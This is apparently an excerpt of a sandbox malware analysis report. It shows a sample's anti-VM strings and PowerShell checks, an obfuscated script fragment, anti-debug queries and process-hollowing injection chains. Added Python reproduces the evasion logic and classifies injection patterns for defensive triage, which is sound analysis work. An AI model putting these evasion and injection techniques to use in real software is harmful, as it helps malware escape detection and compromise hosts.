Source: cmd.exe, 00000014.00000003.1682224430.000002527D8F8000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: C:\Users\user\Desktop\C:\Windows\system32\findstr.exefindstr /i /c:"BOCHS_" /c:"BXPC___" /c:"QEMU" /c:"VirtualBox" findstr /i /c:"BOCHS_" /c:"BXPC___" /c:"QEMU" /c:"VirtualBox" Winsta0\Default=::=::\=C:=C:\Users\user\DesktopAbHorsAGfLWFjJNrKHvWocR=e-Expression 'adnRtmnvxKrKceiWEAAFQW=ion '$TIMGz=qVaeeTRxshUrjZxfqxJBFkNYzLaL=lckmblckpblckrAfNoxIvdXhTBbvJNzCkKYxLKaXkycRIThPnjF=kmblck($Vcvep,AGZcOpprjzwDmCNlvINgjjZlHsYSLqNSSCis=lckSblckyblcksAhnCzrQTYKNgoLUmdjzOYMYqKajhkheLybvqwPqKmnHEAeKjNfwbgEgNiWSyiIJQFcHnpDPnTPBLfuQGqZueKdEUUHiAXSCEDQYywxUjqjircvINglhjoFgCxNsHvopanXhowrjTfkOBVnSyZuuLKtpYKwb=tALLUSERSPROFILE=C:\ProgramDataanDsspKbaAOnvXJVRvGTkogjNLOjOiH=e('blck', '');APPDATA=C:\Users\user\AppData\RoamingatmPoAjKkGZcJzXyyUynWvzDHvk=ty.CryptographaUGORSbYAjGEewLJLAkjASOdO=ct blckSblckybaUMtCDXIBRyZfMXCSGPuCVEiFWmumVX=on qVeuI($eXEDAuUOsIvFTJiTqAZpvwNE=y.PaddingMode]AWVLTAfgiDypHXCDErXpLpMtvtCO=blckib
Source: svchost.exe, 00000035.00000003.2173464093.000002A76A5B6000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: JVMwareVirtual disk6000c298128b8c02a71a2474aeb5f3dc8
Source: lsass.exe, 0000002B.00000000.2078830491.0000017D2CE86000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: NXTVMWare
Source: Microsoft-Windows-PowerShell%4Operational.evtx.53.dr Binary or memory string: $value = $pr.Value.replace("VBOX", $value).replace("VBox", $value).replace("VMWARE", $value).replace("VMware", $value).replace("VirtualBox", $value).replace("Oracle Corporation", $value).replace("Microsoft Basic Display Adapter", $value)
Source: svchost.exe, 00000035.00000003.2189080671.000002A76A565000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: nonicVMware Virtual disk 6000c2942fce4d06663969f532e45d1a
Source: powershell.exe, 00000009.00000002.1690548235.00000275338EF000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: vmmouse.sys`
Source: svchost.exe, 00000031.00000000.2117097116.000001B94D400000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: HvHostWdiSystemHostScDeviceEnumWiaRpctrkwksAudioEndpointBuilderhidservdot3svcUmRdpServiceDsSvcfhsvcvmickvpexchangevmicshutdownvmicguestinterfacevmicvmsessionsvsvcStorSvcWwanSvcvmicvssDevQueryBrokerNgcSvcsysmainNetmanTabletInputServicePcaSvcDisplayEnhancementServiceIPxlatCfgSvcDeviceAssociationServiceNcbServiceEmbeddedModeSensorServicewlansvcCscServiceWPDBusEnumMixedRealityOpenXRSvc
Source: powershell.exe, 00000009.00000002.1690548235.00000275338EF000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: c:\program files\vmware
Source: lsass.exe, 0000002B.00000000.2078830491.0000017D2CE86000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: pvmicheartbeatNT SERVICE
Source: powershell.exe, 00000009.00000002.1690548235.00000275337FF000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: VBoxGuest.sys
Source: powershell.exe, 00000009.00000002.1690548235.00000275337FF000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: VBoxSF.sys
Source: powershell.exe, 00000009.00000002.1690548235.00000275337FF000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: !Hyper-V PowerShell Direct Service
Source: svchost.exe, 0000002C.00000002.2563397137.0000022F4AC13000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\4&224F42EF&0&000000@3
Source: Microsoft-Windows-PowerShell%4Operational.evtx.53.dr Binary or memory string: if(($pr.Name -eq "DeviceId" -or $pr.Name -eq "Caption" -or $pr.Name -eq "Model" -or $pr.Name -eq "PNPDeviceID") -and ($pr.Value -match 'VBOX' -or $pr.Value -match 'VBox' -or $pr.Value -match 'VMWARE' -or $pr.Value -match 'VMware'))
Source: dwm.exe, 0000002D.00000000.2095647683.00000262ED7EF000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000
Source: C:\Windows\System32\dllhost.exe API call chain: ExitProcess graph end node (2 occurrences)
Source: C:\Windows\System32\wbem\WMIC.exe Process information queried: ProcessInformation
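The three script-block fragments logged above (video controller, PnP entity and disk drive properties) together with the cmd.exe findstr line give the complete anti-VM decision logic of this stage. The Python below reproduces it so a sandbox operator can push a spoofed WMI inventory through the same conditions offline; it is an added example, not code from the sample or from the sandbox vendor. The mapping of each fragment to Win32_VideoController, Win32_PnPEntity and Win32_DiskDrive is inferred from the property names (the report does not show the queries), and the two inventories are constructed. Two caveats for triage: PowerShell -match is a case-insensitive regex, so the VBOX/VBox and VMWARE/VMware variants are redundant and every pattern also fires on a substring; and "Microsoft Basic Display Adapter" is present on any host running the in-box display driver, so that condition costs the malware real victims as well as sandboxes.

```python
import re
from dataclasses import dataclass

# Property names and value patterns exactly as they appear in the three script-
# block fragments recovered from the PowerShell Operational log.  Assigning each
# fragment to a WMI class is an assumption from the property names
# (AdapterCompatibility/VideoProcessor -> Win32_VideoController,
#  Service -> Win32_PnPEntity, Model -> Win32_DiskDrive).
CHECKS = {
    "Win32_VideoController": (
        {"Caption", "Name", "PNPDeviceID", "AdapterCompatibility",
         "Description", "InfSection", "VideoProcessor"},
        ["VBOX", "VBox", "VMWARE", "VirtualBox", "VMware",
         "Oracle Corporation", "Microsoft Basic Display Adapter"],
    ),
    "Win32_PnPEntity": (
        {"Caption", "Name", "PNPDeviceID", "Service", "Description"},
        ["VEN_80EE", "VEN_15AD", "VBOX", "VBox", "VMWARE", "VMWare", "VMware",
         "82801FB", "82441FX", "82371SB", "OpenHCD"],
    ),
    "Win32_DiskDrive": (
        {"DeviceId", "Caption", "Model", "PNPDeviceID"},
        ["VBOX", "VBox", "VMWARE", "VMware"],
    ),
}

# Literal strings from the cmd.exe findstr check; /i makes them case-insensitive.
FINDSTR_TERMS = ["BOCHS_", "BXPC___", "QEMU", "VirtualBox"]


@dataclass(frozen=True)
class Hit:
    wmi_class: str
    prop: str
    pattern: str
    value: str


def vm_indicators(records):
    """records: iterable of (wmi_class, {property: value}) pairs, the shape a
    Get-WmiObject / Get-CimInstance result would have.  Returns every property
    the sample's conditions would match.  -match is a case-insensitive regex,
    so re.IGNORECASE with the escaped literal reproduces its behaviour."""
    hits = []
    for wmi_class, props in records:
        if wmi_class not in CHECKS:
            continue
        names, patterns = CHECKS[wmi_class]
        for prop, value in props.items():
            if prop not in names or value is None:
                continue
            for pat in patterns:
                if re.search(re.escape(pat), str(value), re.IGNORECASE):
                    hits.append(Hit(wmi_class, prop, pat, str(value)))
                    break
    return hits


def findstr_hits(text):
    """Equivalent of the batch stage's `findstr /i /c:...` over whatever text is
    piped into it (the report does not show the input; firmware/ACPI table
    dumps are the usual target).  Returns the lines findstr would print."""
    return [line for line in text.splitlines()
            if any(t.lower() in line.lower() for t in FINDSTR_TERMS)]


# Constructed inventory resembling the VMware guest this report ran in
# (compare the "VMware Virtual disk" and VEN_15AD strings in the memory dump).
SANDBOX_INVENTORY = [
    ("Win32_VideoController", {"Name": "VMware SVGA 3D",
                               "AdapterCompatibility": "VMware, Inc.",
                               "InfSection": "VMware"}),
    ("Win32_PnPEntity", {"Caption": "VMware SVGA 3D",
                         "PNPDeviceID": r"PCI\VEN_15AD&DEV_0405&SUBSYS_040515AD&REV_00"}),
    ("Win32_DiskDrive", {"Model": "VMware Virtual disk SCSI Disk Device",
                         "DeviceId": r"\\.\PHYSICALDRIVE0"}),
]

# Constructed inventory with the values rewritten the way a hardened sandbox
# presents them; none of the sample's patterns should fire on it.
CLEAN_INVENTORY = [
    ("Win32_VideoController", {"Name": "NVIDIA GeForce GTX 1060",
                               "AdapterCompatibility": "NVIDIA",
                               "InfSection": "Section002"}),
    ("Win32_PnPEntity", {"Caption": "Intel(R) 300 Series Chipset Family SATA AHCI Controller",
                         "PNPDeviceID": r"PCI\VEN_8086&DEV_A282&SUBSYS_86941043"}),
    ("Win32_DiskDrive", {"Model": "Samsung SSD 970 EVO 500GB",
                         "DeviceId": r"\\.\PHYSICALDRIVE0"}),
]
```

Running vm_indicators(SANDBOX_INVENTORY) returns six hits (three video-controller properties, the PnP caption and its VEN_15AD vendor ID, and the disk model), while CLEAN_INVENTORY returns none; the difference is the list of values a sandbox has to mask before this stage will proceed to the injector.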

Anti Debugging

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread information set: HideFromDebugger (23 occurrences)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process queried: DebugFlags (2 occurrences)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process queried: DebugPort (2 occurrences)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process queried: DebugObjectHandle (2 occurrences)
Source: C:\Windows\System32\cmd.exe Code function: 20_2_000002527DEECD80 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 20_2_000002527DEECD80
Source: C:\Windows\System32\cmd.exe Code function: 20_2_000002527DEE1E3C LoadLibraryA,GetProcAddress,SleepEx, 20_2_000002527DEE1E3C
Source: C:\Windows\System32\cmd.exe Code function: 20_2_000002527DEE11D4 GetProcessHeap,HeapFree,GetProcessHeap,HeapFree, 20_2_000002527DEE11D4
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug (5 occurrences)
Source: C:\Windows\System32\dllhost.exe Process token adjusted: Debug
Source: C:\Windows\System32\cmd.exe Code function: 20_2_000002527DEECD80 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 20_2_000002527DEECD80
Source: C:\Windows\System32\cmd.exe Code function: 20_2_000002527DEE84B0 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 20_2_000002527DEE84B0
Source: C:\Windows\System32\cmd.exe Code function: 20_2_000002527DEE8814 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 20_2_000002527DEE8814
Source: C:\Windows\System32\cmd.exe Code function: 20_2_000002527DF1CD80 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 20_2_000002527DF1CD80
Source: C:\Windows\System32\cmd.exe Code function: 20_2_000002527DF184B0 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 20_2_000002527DF184B0
Source: C:\Windows\System32\cmd.exe Code function: 20_2_000002527DF18814 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 20_2_000002527DF18814
Source: C:\Windows\System32\conhost.exe Code function: 21_2_00000286D7D1CD80 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 21_2_00000286D7D1CD80
Source: C:\Windows\System32\conhost.exe Code function: 21_2_00000286D7D184B0 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 21_2_00000286D7D184B0
Source: C:\Windows\System32\conhost.exe Code function: 21_2_00000286D7D18814 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 21_2_00000286D7D18814
Source: C:\Windows\System32\conhost.exe Code function: 40_2_000001D54783CD80 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 40_2_000001D54783CD80
Source: C:\Windows\System32\conhost.exe Code function: 40_2_000001D5478384B0 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 40_2_000001D5478384B0
Source: C:\Windows\System32\conhost.exe Code function: 40_2_000001D547838814 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 40_2_000001D547838814
Source: C:\Windows\System32\dllhost.exe Code function: 41_2_000001EF0922CD80 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 41_2_000001EF0922CD80
Source: C:\Windows\System32\dllhost.exe Code function: 41_2_000001EF09228814 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 41_2_000001EF09228814
Source: C:\Windows\System32\dllhost.exe Code function: 41_2_000001EF092284B0 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 41_2_000001EF092284B0
Source: C:\Windows\System32\dllhost.exe Code function: 41_2_000001EF0942CD80 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 41_2_000001EF0942CD80
Source: C:\Windows\System32\dllhost.exe Code function: 41_2_000001EF09428814 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 41_2_000001EF09428814
Source: C:\Windows\System32\dllhost.exe Code function: 41_2_000001EF094284B0 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 41_2_000001EF094284B0
Source: C:\Windows\System32\winlogon.exe Code function: 42_2_000001CA7D1E84B0 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 42_2_000001CA7D1E84B0
Source: C:\Windows\System32\winlogon.exe Code function: 42_2_000001CA7D1ECD80 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 42_2_000001CA7D1ECD80
Source: C:\Windows\System32\winlogon.exe Code function: 42_2_000001CA7D1E8814 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 42_2_000001CA7D1E8814
Source: C:\Windows\System32\winlogon.exe Code function: 42_2_000001CA7D2184B0 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 42_2_000001CA7D2184B0
Source: C:\Windows\System32\winlogon.exe Code function: 42_2_000001CA7D21CD80 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 42_2_000001CA7D21CD80
Source: C:\Windows\System32\winlogon.exe Code function: 42_2_000001CA7D218814 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 42_2_000001CA7D218814
Source: C:\Windows\System32\lsass.exe Code function: 43_2_0000017D2DD5CD80 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 43_2_0000017D2DD5CD80
Source: C:\Windows\System32\lsass.exe Code function: 43_2_0000017D2DD584B0 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 43_2_0000017D2DD584B0
Source: C:\Windows\System32\lsass.exe Code function: 43_2_0000017D2DD58814 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 43_2_0000017D2DD58814
Source: C:\Windows\System32\svchost.exe Code function: 44_2_0000022F4B928814 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 44_2_0000022F4B928814
Source: C:\Windows\System32\svchost.exe Code function: 44_2_0000022F4B92CD80 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 44_2_0000022F4B92CD80
Source: C:\Windows\System32\svchost.exe Code function: 44_2_0000022F4B9284B0 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 44_2_0000022F4B9284B0
Source: C:\Windows\System32\svchost.exe Code function: 44_2_0000022F4B958814 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 44_2_0000022F4B958814
Source: C:\Windows\System32\svchost.exe Code function: 44_2_0000022F4B95CD80 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 44_2_0000022F4B95CD80
Source: C:\Windows\System32\svchost.exe Code function: 44_2_0000022F4B9584B0 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 44_2_0000022F4B9584B0
Source: C:\Windows\System32\dwm.exe Code function: 45_2_00000262F1CD8814 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 45_2_00000262F1CD8814
Source: C:\Windows\System32\dwm.exe Code function: 45_2_00000262F1CDCD80 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 45_2_00000262F1CDCD80
Source: C:\Windows\System32\dwm.exe Code function: 45_2_00000262F1CD84B0 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 45_2_00000262F1CD84B0
Source: C:\Windows\System32\dwm.exe Code function: 45_2_00000262F1D08814 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 45_2_00000262F1D08814
Source: C:\Windows\System32\dwm.exe Code function: 45_2_00000262F1D0CD80 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 45_2_00000262F1D0CD80
Source: C:\Windows\System32\dwm.exe Code function: 45_2_00000262F1D084B0 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 45_2_00000262F1D084B0
Source: C:\Windows\System32\svchost.exe Code function: 46_2_0000023942B1CD80 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 46_2_0000023942B1CD80
Source: C:\Windows\System32\svchost.exe Code function: 46_2_0000023942B18814 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 46_2_0000023942B18814
Source: C:\Windows\System32\svchost.exe Code function: 46_2_0000023942B184B0 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 46_2_0000023942B184B0
Source: C:\Windows\System32\svchost.exe Code function: 47_2_000001EF056DCD80 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 47_2_000001EF056DCD80
Source: C:\Windows\System32\svchost.exe Code function: 47_2_000001EF056D8814 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 47_2_000001EF056D8814
Source: C:\Windows\System32\svchost.exe Code function: 47_2_000001EF056D84B0 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 47_2_000001EF056D84B0
Source: C:\Windows\System32\svchost.exe Code function: 47_2_000001EF0570CD80 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 47_2_000001EF0570CD80
Source: C:\Windows\System32\svchost.exe Code function: 47_2_000001EF05708814 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 47_2_000001EF05708814
Source: C:\Windows\System32\svchost.exe Code function: 47_2_000001EF057084B0 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 47_2_000001EF057084B0

HIPS / PFW / Operating System Protection Evasion

Source: 38.2.powershell.exe.4040b0.1.raw.unpack, RunPE.cs .Net Code: Run contains injection code
Source: 39.2.powershell.exe.1909cf124f8.12.raw.unpack, RunPE.cs .Net Code: Run contains injection code
Source: 39.2.powershell.exe.1908cbc0000.0.raw.unpack, RunPE.cs .Net Code: Run contains injection code
Source: 38.2.powershell.exe.4040b0.1.raw.unpack, Unhook.cs Reference to suspicious API methods: VirtualProtect((IntPtr)((long)moduleHandle + num5), (IntPtr)num6, 64u, out var oldProtect)
Source: 38.2.powershell.exe.4040b0.1.raw.unpack, RunPE.cs Reference to suspicious API methods: OpenProcess(128, inheritHandle: false, parentProcessId)
Source: 38.2.powershell.exe.4040b0.1.raw.unpack, RunPE.cs Reference to suspicious API methods: NtAllocateVirtualMemory(process, ref address, IntPtr.Zero, ref size2, 12288u, 64u)
Source: 38.2.powershell.exe.4040b0.1.raw.unpack, RunPE.cs Reference to suspicious API methods: NtWriteVirtualMemory(process, address, payload, num3, IntPtr.Zero)
Source: 38.2.powershell.exe.4040b0.1.raw.unpack, RunPE.cs Reference to suspicious API methods: NtSetContextThread(thread, intPtr5)
Source: C:\Windows\System32\dllhost.exe Code function: 41_2_0000000140002434 CreateProcessW,VirtualAllocEx,WriteProcessMemory,VirtualProtectEx,WriteProcessMemory,VirtualProtectEx,VirtualAlloc,GetThreadContext,WriteProcessMemory,SetThreadContext,ResumeThread,VirtualAllocEx,WriteProcessMemory,VirtualProtectEx,WriteProcessMemory,VirtualProtectEx,VirtualAlloc,Wow64GetThreadContext,WriteProcessMemory,Wow64SetThreadContext,OpenProcess,TerminateProcess, 41_2_0000000140002434
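The chain listed for dllhost.exe above (CreateProcessW, then WriteProcessMemory, GetThreadContext, SetThreadContext and ResumeThread, with a second Wow64GetThreadContext/Wow64SetThreadContext pass for a 32-bit target) is classic process hollowing, and the decompiled RunPE.cs does the same thing with the native OpenProcess, NtAllocateVirtualMemory, NtWriteVirtualMemory and NtSetContextThread calls. The Anti Debugging rows need a caveat when triaged: HideFromDebugger (NtSetInformationThread class 0x11) and the DebugPort, DebugObjectHandle and DebugFlags queries (NtQueryInformationProcess classes 7, 30 and 31) are deliberate checks, but the RtlCaptureContext, RtlLookupFunctionEntry, RtlVirtualUnwind, IsDebuggerPresent, SetUnhandledExceptionFilter sequence is the compiler-emitted MSVC crash-handler prologue, which is why it appears verbatim in every listed process. That it sits at function offsets ending in CD80, 84B0 and 8814 in cmd.exe, conhost.exe, dllhost.exe, winlogon.exe, lsass.exe, svchost.exe and dwm.exe alike suggests one injected module rather than anti-debug code in those Windows binaries. The Python below is an added example, not the report's tooling: it classifies a call chain against the two injection patterns, flags chains that are only the CRT prologue, names the debug information classes, and summarises the Thread created rows (every EIP the report prints ends in 2EBC, i.e. one entry RVA mapped at a different base in each target). The information-class numbers are those of the Windows native API; the log shapes the functions accept are assumptions.

```python
import re
from collections import Counter

# Injection chains as ordered subsequences of API names.  The Win32 chain is the
# one the report lists for dllhost.exe; the Nt* chain is the one the decompiled
# RunPE.cs uses.  Both are generic patterns, not specific to this sample.
INJECTION_CHAINS = {
    "process hollowing (Win32)": [
        "CreateProcessW", "WriteProcessMemory", "SetThreadContext", "ResumeThread"],
    "RunPE (native API)": [
        "OpenProcess", "NtAllocateVirtualMemory", "NtWriteVirtualMemory",
        "NtSetContextThread"],
}

# MSVC CRT crash-handler prologue: calls IsDebuggerPresent, but the compiler
# emits it into every binary, so on its own it is not an anti-debug check.
CRT_HANDLER = ["RtlCaptureContext", "RtlLookupFunctionEntry", "RtlVirtualUnwind",
               "IsDebuggerPresent", "SetUnhandledExceptionFilter",
               "UnhandledExceptionFilter"]

# Information classes behind the "Process queried" / "Thread information set"
# rows (NtQueryInformationProcess 7, 30, 31; NtSetInformationThread 0x11).
DEBUG_INFO_CLASSES = {
    ("NtQueryInformationProcess", 7): "ProcessDebugPort",
    ("NtQueryInformationProcess", 30): "ProcessDebugObjectHandle",
    ("NtQueryInformationProcess", 31): "ProcessDebugFlags",
    ("NtSetInformationThread", 0x11): "ThreadHideFromDebugger",
}

_WOW64_CTX = re.compile(r"^Wow64(Get|Set)ThreadContext$")
_CODE_FN = re.compile(r"Code function: (\S+) (.+?),? \1$")
_THREAD = re.compile(r"Thread created: (.+?) EIP: ([0-9A-Fa-f]+)$")


def normalize(api):
    """Fold the WOW64 thread-context calls and the A/W CreateProcess variants
    onto one name so a single chain covers 32- and 64-bit targets."""
    m = _WOW64_CTX.match(api)
    if m:
        return m.group(1) + "ThreadContext"
    if api in ("CreateProcessA", "CreateProcessW"):
        return "CreateProcessW"
    return api


def parse_code_function(line):
    """API names, in call order, from a report 'Code function:' row."""
    m = _CODE_FN.search(line)
    return [normalize(a) for a in m.group(2).split(",") if a] if m else []


def _is_subsequence(pattern, calls):
    it = iter(calls)
    return all(any(c == p for c in it) for p in pattern)


def classify_chain(calls):
    """Injection patterns present in the call list, plus whether the list is
    nothing but the CRT handler prologue (the usual false positive)."""
    calls = [normalize(c) for c in calls]
    found = [name for name, chain in INJECTION_CHAINS.items()
             if _is_subsequence(chain, calls)]
    crt_vocab = set(CRT_HANDLER) | {"IsProcessorFeaturePresent"}
    crt_only = (not found and _is_subsequence(CRT_HANDLER, calls)
                and set(calls) <= crt_vocab)
    return {"injection": found, "crt_handler_only": crt_only}


def debug_checks(events):
    """events: (api, information_class) pairs as an API monitor would log them
    (assumed shape).  Returns the named anti-debug queries; other classes,
    e.g. ProcessBasicInformation (0), are ignored."""
    return [DEBUG_INFO_CLASSES[e] for e in events if e in DEBUG_INFO_CLASSES]


def thread_entry_summary(lines):
    """Count 'Thread created' rows per target and collect the low 16 bits of
    each EIP; one shared value across targets means one image mapped at a
    different base in each process."""
    targets, offsets = Counter(), set()
    for line in lines:
        m = _THREAD.search(line)
        if m:
            targets[m.group(1)] += 1
            offsets.add(int(m.group(2), 16) & 0xFFFF)
    return targets, offsets


# Rows copied from the report; RUNPE_CALLS is constructed from the API
# references the report quotes out of RunPE.cs.
DLLHOST_ROW = ("Source: C:\\Windows\\System32\\dllhost.exe Code function: "
               "41_2_0000000140002434 CreateProcessW,VirtualAllocEx,WriteProcessMemory,"
               "VirtualProtectEx,WriteProcessMemory,VirtualProtectEx,VirtualAlloc,"
               "GetThreadContext,WriteProcessMemory,SetThreadContext,ResumeThread,"
               "VirtualAllocEx,WriteProcessMemory,VirtualProtectEx,WriteProcessMemory,"
               "VirtualProtectEx,VirtualAlloc,Wow64GetThreadContext,WriteProcessMemory,"
               "Wow64SetThreadContext,OpenProcess,TerminateProcess, 41_2_0000000140002434")
CRT_ROW = ("Source: C:\\Windows\\System32\\lsass.exe Code function: 43_2_0000017D2DD584B0 "
           "IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,"
           "RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,"
           "UnhandledExceptionFilter, 43_2_0000017D2DD584B0")
RUNPE_CALLS = ["OpenProcess", "NtAllocateVirtualMemory", "NtWriteVirtualMemory",
               "NtGetContextThread", "NtSetContextThread", "NtResumeThread"]
THREAD_ROWS = [
    "Source: C:\\Windows\\System32\\dllhost.exe Thread created: C:\\Windows\\System32\\winlogon.exe EIP: 7D1B2EBC",
    "Source: C:\\Windows\\System32\\dllhost.exe Thread created: C:\\Windows\\System32\\lsass.exe EIP: 2DD22EBC",
    "Source: C:\\Windows\\System32\\dllhost.exe Thread created: C:\\Windows\\System32\\svchost.exe EIP: 4B922EBC",
    "Source: C:\\Windows\\System32\\dllhost.exe Thread created: C:\\Windows\\System32\\svchost.exe EIP: 56A2EBC",
]
```

classify_chain(parse_code_function(DLLHOST_ROW)) reports the hollowing pattern, the lsass.exe row comes back as CRT prologue only, and thread_entry_summary over the Thread created rows yields a single low-16-bit offset of 0x2EBC, which is the pivot an analyst would use to confirm that every target received the same payload image.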
